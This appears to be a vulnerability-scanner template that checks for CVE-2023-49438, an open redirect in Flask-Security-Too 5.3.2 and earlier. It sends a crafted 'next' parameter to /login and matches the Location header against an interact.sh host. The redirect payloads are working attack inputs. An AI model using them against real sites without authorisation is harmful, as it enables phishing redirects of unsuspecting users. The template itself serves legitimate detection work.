id: CVE-2023-49438

info:
  name: Python Flask-Security-Too <=5.3.2 - Open Redirect
  author: ritikchaddha
  severity: medium
  description: |
    An open redirect vulnerability exists in the python package Flask-Security-Too prior to version 5.3.3. Attackers can abuse the 'next' parameter on the /login and /register routes to redirect unsuspecting users to malicious sites via crafted URLs, which could lead to phishing or other attacks ([NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-49438)).
  impact: |
    Allows attackers to redirect users to arbitrary sites, potentially leading to phishing, data theft, or user session hijacking.
  remediation: |
    Upgrade Flask-Security-Too to version 5.3.3 or later to mitigate the open redirect vulnerability.
  reference:
    - https://github.com/Flask-Middleware/flask-security
    - https://github.com/brandon-t-elliott/CVE-2023-49438
    - https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6HCYH377TPUMUHELPI36PDS2ZM4VFIXM/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-49438
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-49438
    cwe-id: CWE-601
    epss-score: 0.01079
    epss-percentile: 0.60852
    cpe: cpe:2.3:a:flask-security-too_project:flask-security-too:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: flask-security-too_project
    product: flask-security-too
  tags: cve2023,cve,redirect,flask,flask-security,redirect

http:
  - raw:
      - |
        GET /login HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        next={{path}}&csrf_token={{csrftoken}}&email={{username}}&password={{password}}&submit=Login

    payloads:
      path:
        - /\interact.sh
        - \/interact.sh

    matchers:
      - type: regex
        part: header_2
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'

    extractors:
      - type: regex
        part: body
        name: csrftoken
        group: 1
        regex:
          - 'name="csrf-token" content="(.*)"'
        internal: true
# digest: 4a0a0047304502200e62198376d72e47260ae6f78d5f802867cf519a1b96353bfc3ad4ac9afd5f21022100d1d0772daca94c464420a203dfecb82bc0eed3f1563a2674a4bd3a67ca4d3117:922c64590222798bb761d5b6d8e72950